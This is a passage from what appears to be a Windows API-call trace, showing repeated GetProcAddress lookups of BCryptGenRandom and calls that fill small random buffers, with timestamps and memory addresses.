cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02874, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a02874) returned 0x0 [0200.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0289c, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a0289c) returned 0x0 [0200.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0200.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028b6, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a028b6) returned 0x0 [0200.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0200.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028d6, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a028d6) returned 0x0 [0200.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.782] GetProcAddress (hModule=0x7ffc5bcc0000, 